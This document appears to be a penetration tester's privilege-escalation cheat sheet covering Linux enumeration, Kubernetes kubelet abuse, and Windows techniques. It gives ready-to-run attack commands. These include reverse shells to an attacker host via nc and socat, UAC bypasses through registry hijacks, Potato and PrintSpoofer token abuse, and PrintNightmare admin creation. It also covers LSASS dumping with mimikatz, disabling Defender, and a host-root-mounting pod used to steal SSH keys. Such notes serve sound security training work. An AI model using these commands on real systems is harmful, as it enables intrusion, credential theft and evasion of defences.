Privilege Escalation (PrivEsc)

NOTE: scripts are noisy for any sort of monitoring software, so manual checks may be preferred

Key Details

Versions of:

  • OS
  • Kernel
  • Services
  • Installed packages
  • Logged-in users
  • User Directories
  • Command/Shell History
  • Configuration Files
  • Scheduled Jobs
  • Extra File Systems/Drives
  • File Permissions
  • Writeable Files and Directories

🐧 Linux

linPEAS

# === ATTACKER ===

wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
ip a ; python3 -m http.server 8000

# === TARGET ===

cd /tmp
wget http://<ATTACKER_IP>:8000/linpeas.sh && chmod +x linpeas.sh
REGEXES="0" ./linpeas.sh 2>&1 | tee linpeas_output.txt

# === ATTACKER ===

scp <USER>@<TARGET>:/tmp/linpeas_output.txt ~/
# NC
nc -l -p <PORT> > ~/linpeas_output.txt
cat /tmp/linpeas_output.txt | nc <ATTACKER_IP> <PORT>
# wait a moment, then CTRL+C

Manual Survey

whoami ; id ; hostname ; ip a || ifconfig -a
uname -a ; cat /etc/*release*

arp -an
ip r || netstat -rn
netstat -tun
# For domains
cat /etc/resolv.conf /etc/hosts

netstat -tuanlp || ss -tuanlp

# Check non-standard paths or variables
echo $PATH
env

cat /etc/shells

lsblk
cat /etc/fstab
df -h
# Unmounted filesystems
cat /etc/fstab | grep -v "#" | column -t

# Debian-based systems
dpkg -l

ps -ef
pstree
# Interesting commands
for p in /proc/[0-9]*; do cmd=$(tr '\0' ' ' < "$p/cmdline" 2>/dev/null); [ -n "$cmd" ] && echo "[PID: ${p##*/}] $cmd"; done

# Users only
cat /etc/passwd | cut -f1 -d:
# Users with shell access
cat /etc/passwd | grep sh
# Groups
cat /etc/group
# Active or recent users
w ; lastlog

===
# LOOKING FOR PRIV ESCs
===

# GTFObins Priv Esc check
apt list --installed | tr "/" " " | cut -d" " -f1,3 | sed 's/[0-9]://g' | tee -a installed_pkgs.list
for i in $(curl -s https://gtfobins.org/api.json | jq -r '.executables | keys[]'); do if grep -q "$i" installed_pkgs.list; then echo "Check for GTFO: $i";fi; done

ls -la /etc/crontab /var/spool/cron/crontabs/root /etc/cron.*

ls -la / /home/ /home/*/.ssh/ /root/.ssh/

# Conf files
find / \( -path "/proc" -o -path "/usr" -o -path "/lib" \) -prune -o \( -iname "*.conf" -o -iname "*.config" \) -exec ls -la {} + 2>/dev/null
# Search for all files that contain keyword in name
find / \( -path "/proc" -o -path "/usr" -o -path "/lib" \) -prune -o -type f -iname "<KEYWORD>" -exec ls -la {} + 2>/dev/null
# Creds Search
grep -Hran --color=always --exclude-dir={bin,boot,dev,lib,lib64,proc,sys,sbin,snap,sys,run,usr} 'user\|passw' / 2>/dev/null | less -R

# History
history
find / -type f \( -name '*_hist' -o -name '*_history' \) -exec ls -l {} \; 2>/dev/null

# Search for interesting scripts
find / -type f -name '*.sh' 2>/dev/null | grep -v "src\|snap\|share"
find / -name '*.sh' 2>/dev/null

# Hidden folders and files
# NOTE: usually best to grep for a user or something to reduce results
find / -type d -name ".*" -ls 2>/dev/null
find / -type f -name ".*" -exec ls -l {} \; 2>/dev/null | grep WORD

# Temp folders
ls -la /tmp /var/tmp /dev/shm

# Writeable Files
find / \( -path /proc -o -path /sys -o -path /var \) -prune -o -type f -perm -o+w 2>/dev/null
# Writeable directories
find / \( -path /proc -o -path /sys -o -path /var \) -prune -o -type d -perm -o+w 2>/dev/null
# SETUID Files (user executes program as owner user)
find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null
# SETGID Files (user groups executes program as owner group)
find / -user root -perm -2000 -exec ls -ldb {} \; 2>/dev/null
# World-writeable files
find / -type f -perm -00002 -ls 2>/dev/null

# Users with shells
grep "sh$" /etc/passwd

cat /etc/group
# Users in "sudo" group
getent group sudo

# Rarely hashes in passwd or readable shadow
cat /etc/passwd /etc/shadow

# Summarized reports of logs
aureport --tty | less

# CTF Special
sudo -V  # Check version exploits
sudo -l  # Look for NOPASSWD
File Permissions

Standard Permission Bits

PermissionOctalSymbolMeaning on FileMeaning on Directory
Read4rCan read file contents (cat).Can list contents (ls).
Write2wCan modify file contents.Can add/delete files inside.
Execute1xCan run the file as a process.Can enter the directory (cd).

Special Permission Bits

Special BitOctalSymbolLocationOffensive Value (PrivEsc / Persistence)
SUID (Set-User-ID)4000s / SOwner (-rwS------)High: Process runs with the privileges of the file Owner (usually root), regardless of who launched it.
SGID (Set-Group-ID)2000s / SGroup (----rws---)Medium: Process runs with privileges of the file Group. Used for lateral movement (e.g., accessing adm or shadow group files).
Sticky Bit1000t / TOther (-------rwt)None: Prevents users from deleting other users’ files in shared directories (like /tmp).

NOTE:

The Lowercase s vs. Uppercase S

  • Lowercase s (Active): The SUID bit is set AND the underlying execute (x) bit is set. The file will execute properly.
  • Uppercase S (Broken): The SUID bit is set, BUT the underlying execute (x) bit is missing. The file cannot be executed. The admin made a mistake.

The Linux Kernel natively ignores SUID/SGID bits on interpreted scripts (.sh, .py, .pl).

  • If you find -rwsr-xr-x root root backup.sh, running ./backup.sh will execute as YOUR user, not root.
  • The Exception: SUID only works automatically on Compiled ELF Binaries (C, C++, Go, Rust).

Groups

Certain groups for a user’s id output could give greater access:

  • disk: can mount any disk with debugfs to read the file system
  • adm: reads logs in /var/log/
  • docker: priv esc
  • lxd/lxc: can mount filesystems in LXC containers
  • shadow: allows read access of password hashes
  • staff: grants perms to /usr/local/bin/ and /usr/local/sbin/
  • wireshark/pcap: capture network traffic (creds sniffing)
  • video: can screenshot user’s desktop
  • wheel: Red Hat/CentOS equivalent to sudo

Capabilities

The following especially can lead to root:

CapabilityDescription
cap_setuidAllows a process to set its effective user ID, which can be used to gain the privileges of another user, including the root user.
cap_setgidAllows to set its effective group ID, which can be used to gain the privileges of another group, including the root group.
cap_sys_adminThis capability provides a broad range of administrative privileges, including the ability to perform many actions reserved for the root user, such as modifying system settings and mounting and unmounting file systems.
cap_dac_overrideAllows bypassing of file read, write, and execute permission checks.
# Easy wins
find /usr/bin /usr/sbin /usr/local/bin /usr/local/sbin -type f -exec getcap {} \;

# Exhaustive
getcap -r / 2>/dev/null

Mitigation

A straightforward tool to assess the security posture of UNIX devices is:

Kubernetes

Control Plane

The Control Plane serves as the management layer. It consists of several crucial components, including:

ServiceTCP Ports
etcd2379, 2380
API server6443
Scheduler10251
Controller Manager10252
Kubelet API10250
Read-Only Kubelet API10255
# Check for API server
curl -k https://<TARGET>:6443

# Pods list
curl -k https://<TARGET>:6443/pods | jq .

# Native pods enumeration
kubeletctl -i --server <TARGET> pods

# Scan for known RCEs against nodes
kubeletctl -i --server <TARGET> scan rce

# Interact with node
kubeletctl -i --server <TARGET> exec "id" -p nginx -c nginx

# Extracting tokens
kubeletctl -i --server <TARGET> exec "cat /var/run/secrets/kubernetes.io/serviceaccount/token" -p nginx -c nginx | tee -a k8.token

# Extracting certificates
kubeletctl --server <TARGET> exec "cat /var/run/secrets/kubernetes.io/serviceaccount/ca.crt" -p nginx -c nginx | tee -a ca.crt

# List privileges
export token=$(cat k8.token)
kubectl --token=$token --certificate-authority=ca.crt --server=https://<TARGET>:6443 auth can-i --list

privesc.yaml

This mount the host’s root file system

apiVersion: v1
kind: Pod
metadata:
  name: privesc
  namespace: default
spec:
  containers:
  - name: privesc
    image: nginx:1.14.2
    volumeMounts:
    - mountPath: /root
      name: mount-root-into-mnt
  volumes:
  - name: mount-root-into-mnt
    hostPath:
       path: /
  automountServiceAccountToken: true
  hostNetwork: true
# Create new pod
kubectl --token=$token --certificate-authority=ca.crt --server=https://<TARGET>:6443 apply -f privesc.yaml

# Verify
kubectl --token=$token --certificate-authority=ca.crt --server=https://<TARGET>:6443 get pods

# Get root key
kubeletctl --server <TARGET> exec "cat /root/root/.ssh/id_rsa" -p privesc -c privesc

🪟 Windows

Check [[active-directory]] for a whole host of domain-related priv escs. Check [[security-products]] for bypasses for UAC and more. Check [[finding-creds]] for searching for credentials.

systeminfo wesng.py Analyzer

git clone https://github.com/bitsadmin/wesng.git && cd wesng
python3 wes.py ~/loot/systeminfo.txt

SharpUp

wget https://github.com/r3motecontrol/Ghostpack-CompiledBinaries/raw/refs/heads/master/SharpUp.exe

.\SharpUp.exe audit

winPEAS

Manual Survey

# Networking info
ipconfig /all
arp -a
route print

# BEST?: Programs w/ Versions
$INSTALLED = Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* |  Select-Object DisplayName, DisplayVersion, InstallLocation
$INSTALLED += Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, InstallLocation
$INSTALLED | ?{ $_.DisplayName -ne $null } | sort-object -Property DisplayName -Unique | Format-Table -AutoSize

# Installed programs
for %f in ("C:\Program Files", "C:\Program Files (x86)") do @(echo. && echo --- Listing: %~f --- && dir "%~f" /b)

# WMI Method
wmic product get name
Get-WmiObject -Class Win32_Product |  select Name, Version

Normal processes:

# Running processes and services
tasklist /svc
netstat -ano

# Scheduled Tasks
schtasks /query /fo LIST /v

# Env Variables
set

# Detailed machine info
systeminfo
ver
[environment]::OSVersion.Version

# Alt method for Hotfixes
wmic qfe list brief
Get-HotFix | ft -AutoSize

# Query logged-in users (usually RDP)
query user

# Current user
echo %USERNAME%

# Current User Privs & Groups
whoami /all

# User accounts w/ Descriptions
Get-LocalUser
# All users, groups, admins, password policy
net user
net user %username%
net localgroup
net localgroup administrators
net accounts
gpresult /r

# Command line history
(Get-PSReadLineOption).HistorySavePath

# List Named Pipes
pipelist.exe /accepteula
Get-ChildItem \\.\pipe\
# Show Named Pipe Permissions
# NOTE: Drop the "\\."
accesschk.exe /accepteula \pipe\<NAME> -v
See more about… Windows Defender

Source: Docs > 6 - Post-Exploitation > security-products#windows-defender

Windows Defender

# Check WinDefend service
sc.exe query windefend

# Check Status
Get-MpComputerStatus

# Enable WinDefend
Set-MpPreference -DisableRealtimeMonitoring $false
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command "Set-MpPreference -DisableRealtimeMonitoring $false"

# Disable WinDefend realtime monitoring
Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command "Set-MpPreference -DisableRealtimeMonitoring $true"
See more about… Windows Firewall

Source: Docs > 6 - Post-Exploitation > security-products#windows-firewall

Windows Firewall

# Show state of all profiles
netsh advfirewall show allprofiles
# Add Firewall Exception
netsh advfirewall firewall add rule name=<NAME> dir=in action=allow protocol=TCP localport=<PORT>
See more about… AppLocker

Source: Docs > 6 - Post-Exploitation > security-products#applocker

AppLocker

Built-in application whitelister. Commonly cmd.exe and powershell.exe will be blocked, but PowerShell lives in multiple locations:

# Get Rules
Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
See more about… User Account Control

Source: Docs > 6 - Post-Exploitation > security-products#user-account-control

User Account Control

NOTE: These works when UAC is NOT “Always Notify”

# msconfig
WIN+R > msconfig > Tools > Select "Command Prompt" > Launch

# azman.msc
Help > Help Topics > Right-Click > View Source > Show "All Files" > Search and Select "cmd.exe" > Right-Click > Open

# Fodhelper.exe w/ Socat
nc -nvlp <PORT>

set REG_KEY=HKCU\Software\Classes\ms-settings\Shell\Open\command
set CMD="powershell -windowstyle hidden C:\Tools\socat\socat.exe TCP:<ATTACKER_IP>:<PORT> EXEC:cmd.exe,pipes"
reg add %REG_KEY% /v "DelegateExecute" /d "" /f
reg add %REG_KEY% /d %CMD% /f & fodhelper.exe

whoami /groups
// success HIGH!

reg delete HKCU\Software\Classes\ms-settings\ /f
reg query %REG_KEY% /v ""

# WinDefend-Safe UAC Bypass w/ Socat
powershell.exe

$program = "powershell -windowstyle hidden C:\tools\socat\socat.exe <ATTACKER_IP>:<PORT> EXEC:cmd.exe,pipes"
New-Item "HKCU:\Software\Classes\.update\Shell\Open\command" -Force
Set-ItemProperty "HKCU:\Software\Classes\.update\Shell\Open\command" -Name "(default)" -Value $program -Force
New-Item -Path "HKCU:\Software\Classes\ms-settings\CurVer" -Force
Set-ItemProperty  "HKCU:\Software\Classes\ms-settings\CurVer" -Name "(default)" -value ".update" -Force
Start-Process "C:\Windows\System32\fodhelper.exe" -WindowStyle Hidden
// success!

reg delete "HKCU\Software\Classes\.update\" /f
reg delete "HKCU\Software\Classes\ms-settings\" /f

# "Always Notify"-Safe UAC Bypass (but NOT WinDefend-Safe)
nc -lvnp <PORT>
           
reg add "HKCU\Environment" /v "windir" /d "cmd.exe /c C:\tools\socat\socat.exe <ATTACKER_IP>:<PORT> EXEC:cmd.exe,pipes &REM " /f
schtasks /run  /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I
// success!

reg delete "HKCU\Environment" /v "windir" /f

# Auto-Bypass (up-to-date)
# https://github.com/hfiref0x/UACME

C:\tools\UACME-Akagi64.exe 33

Privileges vs. Access Rights

  • https://blog.palantir.com/windows-privilege-abuse-auditing-detection-and-defense-3078a403d74e

  • Privileges are tied to WHO/the user’s access token (assigned on logon, can differ local and domain), which are essentially overrides to bypass the normal rules (access rights)

    • SeTakeOwnershipPrivilege: Allows you to change the Owner of any object. Once you are the Owner, Windows automatically grants you the Access Right to rewrite the DACL (known as WRITE_DAC). You can then grant yourself GenericAll Access Rights.
    • SeImpersonatePrivilege: Allows you to copy a higher-privileged Token (e.g., NT AUTHORITY\SYSTEM via tools like SweetPotato/PrintSpoofer), instantly granting you all System Privileges and Universal Access Rights.

  • Access Rights (permissions) are tied to WHAT/the object (File, Folder, Registry Key, Service, Named Pipe) via “Security Descriptors”

  • Security Principals are the WHO/users, machines, or groups** that have their own SIDs

    • **groups cannot login but have Access Rights

When a Security Principal (e.g. user) wants to access a resource (e.g. file), the OS will perform an authorization check of the user against the resource’s Security Descriptor (e.g. access rights). The Security Descriptor might have multiple Access Control Entries, which will grant access if there is at least 1 match.

Authentication Process - Windows

Good Privileges

Setting ConstantSetting NameStandard AssignmentDescription
SeNetworkLogonRightAccess this computer from the networkAdministrators, Authenticated UsersDetermines which users can connect to the device from the network. This is required by network protocols such as SMB, NetBIOS, CIFS, and COM+.
SeRemoteInteractiveLogonRightAllow log on through Remote Desktop ServicesAdministrators, Remote Desktop UsersThis policy setting determines which users or groups can access the login screen of a remote device through a Remote Desktop Services connection. A user can establish a Remote Desktop Services connection to a particular server but not be able to log on to the console of that same server.
SeBackupPrivilegeBack up files and directoriesAdministratorsThis user right determines which users can bypass file and directory, registry, and other persistent object permissions for the purposes of backing up the system.
SeSecurityPrivilegeManage auditing and security logAdministratorsThis policy setting determines which users can specify object access audit options for individual resources such as files, Active Directory objects, and registry keys. These objects specify their system access control lists (SACL). A user assigned this user right can also view and clear the Security log in Event Viewer.
SeTakeOwnershipPrivilegeTake ownership of files or other objectsAdministratorsThis policy setting determines which users can take ownership of any securable object in the device, including Active Directory objects, NTFS files and folders, printers, registry keys, services, processes, and threads.
SeDebugPrivilegeDebug programsAdministratorsThis policy setting determines which users can attach to or open any process, even a process they do not own. Developers who are debugging their applications do not need this user right. Developers who are debugging new system components need this user right. This user right provides access to sensitive and critical operating system components.
SeImpersonatePrivilegeImpersonate a client after authenticationAdministrators, Local Service, Network Service, ServiceThis policy setting determines which programs are allowed to impersonate a user or another specified account and act on behalf of the user.
SeLoadDriverPrivilegeLoad and unload device driversAdministratorsThis policy setting determines which users can dynamically load and unload device drivers. This user right is not required if a signed driver for the new hardware already exists in the driver.cab file on the device. Device drivers run as highly privileged code.
SeRestorePrivilegeRestore files and directoriesAdministratorsThis security setting determines which users can bypass file, directory, registry, and other persistent object permissions when they restore backed up files and directories. It determines which users can set valid security principals as the owner of an object.
SeTcbPrivilegeAct as part of the operating systemAdministrators, Local Service, Network Service, ServiceThis security setting determines whether a process can assume the identity of any user and, through this, obtain access to resources that the targeted user is permitted to access (impersonation). This may be assigned to antivirus or backup tools that need the ability to access all system files for scans or backups. This privilege should be reserved for service accounts requiring this access for legitimate activities.

Good Accounts

AccountDescription
NT AUTHORITY\SYSTEM / LocalSystemA highly privileged account with more privileges than a local administrator; used to run most Windows services. See LocalSystem account.
Built-in local AdministratorThe built-in local administrator account. Some organizations disable this account, but many do not. It is not uncommon to see this account reused across multiple systems in a client environment.
Local member of AdministratorsAnother local account in the local Administrators group. Any account in this group has the same privileges as the built-in Administrator account.
Domain user in local AdministratorsA standard (non-privileged) domain user who is part of the local Administrators group.
Domain admin in local AdministratorsA domain admin (highly privileged in Active Directory) that is part of the local Administrators group.

Good Groups

GroupDescription
Default AdministratorsDomain Admins and Enterprise Admins are “super” groups.
Server OperatorsMembers can modify services, access SMB shares, and backup files.
Backup OperatorsMembers are allowed to log onto DCs locally and should be considered Domain Admins. They can make shadow copies of the SAM/NTDS database, read the registry remotely, and access the file system on the DC via SMB. This group is sometimes added to the local Backup Operators group on non-DCs.
Print OperatorsMembers can log on to DCs locally and “trick” Windows into loading a malicious driver.
Hyper-V AdministratorsIf there are virtual DCs, any virtualization admins, such as members of Hyper-V Administrators, should be considered Domain Admins.
Account OperatorsMembers can modify non-protected accounts and groups in the domain.
Remote Desktop UsersMembers are not given any useful permissions by default but are often granted additional rights such as Allow Login Through Remote Desktop Services and can move laterally using the RDP protocol.
Remote Management UsersMembers can log on to DCs with PSRemoting (This group is sometimes added to the local remote management group on non-DCs).
Group Policy Creator OwnersMembers can create new GPOs but would need to be delegated additional permissions to link GPOs to a container such as a domain or OU.
Schema AdminsMembers can modify the Active Directory schema structure and backdoor any to-be-created Group/GPO by adding a compromised account to the default object ACL.
DNS AdminsMembers can load a DLL on a DC, but do not have the necessary permissions to restart the DNS server. They can load a malicious DLL and wait for a reboot as a persistence mechanism. Loading a DLL will often result in the service crashing. A more reliable way to exploit this group is to create a WPAD record.

File/Folder Permissions

Look for F, M, or W assigned to unprivileged groups.

CodeMeaningOffensive Value
FFull ControlJackpot. You can overwrite the file, read it, delete it, or change its permissions.
MModifyHigh. You can read, write, and delete the file. (Functionally identical to F for hijacking).
WWriteHigh. You can overwrite the file with a malicious payload (e.g., a reverse shell .exe).
RXRead & ExecuteNone (Usually). You can read the file and run it, but you cannot alter it.
RReadLow. Useful only for stealing configuration files or hardcoded credentials.
CodeMeaningContext
(I)InheritedThis permission wasn’t set on the file itself; it was passed down from the parent folder (e.g., C:\Program Files).
(OI)Object InheritApplied to a folder: All files inside will inherit this permission.
(CI)Container InheritApplied to a folder: All sub-folders inside will inherit this permission.
(IO)Inherit OnlyThis permission applies only to children, not the current folder itself.

Exploits

via Meterpreter session:

run post/multi/recon/local_exploit_suggester
via SeImpersonate
JuicyPotato

Needs SeImpersonate or SeAssignPrimaryToken

# NOTE: Upload JUPO and nc.exe
nc -lnvp <PORT>
c:\tools\JuicyPotato.exe -l 53375 -p c:\windows\system32\cmd.exe -a "/c c:\tools\nc.exe <ATTACKER_IP> <PORT> -e cmd.exe" -t *
RoguePotato/GodPotato/PrintSpoofer/PrintNightmare

Needs SeImpersonate (or equivalent for the tool chain). Upload the chosen binary and nc.exe (or use built-in shells where documented).

RoguePotato (usage): -r is the redirector (usually your attacker host); -e is the full command line; -l runs RogueOxidResolver locally on that port (all-in-one). Optional: -c {clsid}, -p / -z pipe name.

# Listener on attacker
nc -lnvp <PORT>

# All-in-one: RogueOxidResolver on victim, forward/OXID redirector at attacker
c:\tools\RoguePotato.exe -r <ATTACKER_IP> -e "cmd /c c:\tools\nc.exe <ATTACKER_IP> <PORT> -e cmd.exe" -l 9999

# Without local RogueOxidResolver: run RogueOxidResolver.exe on the remote/redirector machine (see repo), then e.g.:
c:\tools\RoguePotato.exe -r <ATTACKER_IP> -e "cmd /c c:\tools\nc.exe <ATTACKER_IP> <PORT> -e cmd.exe"

GodPotato (example): only -cmd is required; the tool supplies CLSID behavior internally.

nc -lnvp <PORT>

c:\tools\GodPotato.exe -cmd "cmd /c c:\tools\nc.exe <ATTACKER_IP> <PORT> -e cmd.exe"

# As in upstream README (nc connects out; adjust paths/nc flags to your binary)
c:\tools\GodPotato.exe -cmd "nc -t -e C:\Windows\System32\cmd.exe <ATTACKER_IP> <PORT>"

PrintSpoofer (usage): -c runs the command as SYSTEM; -i attaches an interactive SYSTEM process to the current console (bind/reverse/psexec-style shells).

nc -lnvp <PORT>

# Non-interactive: spawn and exit (WinRM/webshell-style) — matches upstream example
c:\tools\PrintSpoofer.exe -c "c:\tools\nc.exe <ATTACKER_IP> <PORT> -e cmd"

# Interactive: SYSTEM cmd in the same console (reverse/bind shell, psexec, etc.)
c:\tools\PrintSpoofer.exe -i -c cmd

PrintNightmare (usage): PowerShell via the Print Spooler (Invoke-Nightmare). By default, it creates local admin adm1n with password P@ssw0rd; use parameters to set custom credentials or load a custom DLL payload.

# Load the module
Import-Module .\CVE-2021-1675.ps1

# Custom local admin credentials
Invoke-Nightmare -DriverName "BackupService" -NewUser "svc_backup" -NewPassword "P@ssw0rd123!"

# Custom DLL payload path
Invoke-Nightmare -DLL "C:\bindshell.dll"
via SeDebug
See more about… LSASS

Source: Docs > 6 - Post-Exploitation > authentication-windows#lsass

LSASS

# Remotely dump LSA secrets
# NOTE: also requires **SeDebugPrivilege**
netexec smb <TARGET> --local-auth -u <USER> -p <PASSWORD> --lsa
# Remotely dump SAM secrets
netexec smb <TARGET> --local-auth -u <USER> -p <PASSWORD> --sam

NOTE: These require SeDebugPrivilege

Get LSASS memory dump via GUI:

  1. Open Task Manager
  2. Select Details > lsass.exe
  3. Right-Click > “Create Dump File”
  4. Move or transfer the file (usually in %TMP%)
# Get LSASS PID
tasklist /fi "IMAGENAME eq lsass.exe"
Get-Process lsass

# Dump
powershell -command "rundll32.exe C:\windows\system32\comsvcs.dll,MiniDump <PID> $env:TMP\crash.dmp full"

# Parse creds/hashes from dump
pypykatz lsa minidump <DUMP_FILE>
# OR
.\mimikatz.exe
log
sekurlsa::minidump crash.dmp
sekurlsa::logonpasswords
via SeTakeOwnership

NOTE: this is considered dangerous and destructive since not only can it be hard to revert but also could have unintended consequences and breakages for services that use the file

# Get file info
Get-ChildItem -Path '<FILE>' | Select Fullname,LastWriteTime,Attributes,@{Name="Owner";Expression={ (Get-Acl $_.FullName).Owner }}
# Or if that fails, check the folder ownership
cmd /c dir /q '<FOLDER>'

# Change ownership
takeown /f '<FILE>'

# OPTIONAL: grant *full* ACL permissions (e.g. READ)
icacls '<FILE>' /grant <USER>:F

Python

The following logic can be placed under a particular module’s function (ideally at the beginning of the function) to achieve a priv esc:

    import os
    os.system("id")
    os.system('ls -la /root/')

Wrong write permissions

# Check Python scripts itself
ls -la <PYTHON_FILE>
# Later check its imports

# See if imports are hookable
python3 -V
grep -r "def <FUNCTION>" /usr/local/lib/python3.8/dist-packages/<MODULE>/*

ls -l /usr/local/lib/python3.8/dist-packages/<MODULE>/__init__.py

Library Path

# Check Python library importation order
python3 -c 'import sys; print("\n".join(sys.path))'

# Check for module location
pip3 show <MODULE>

PYTHONPATH environment variable

# Sometimes the script or executable needs to be executed in a very specific manner
sudo -l

# Execute over-written function
sudo PYTHONPATH=/tmp/ /usr/bin/python3 <PYTHON_FILE>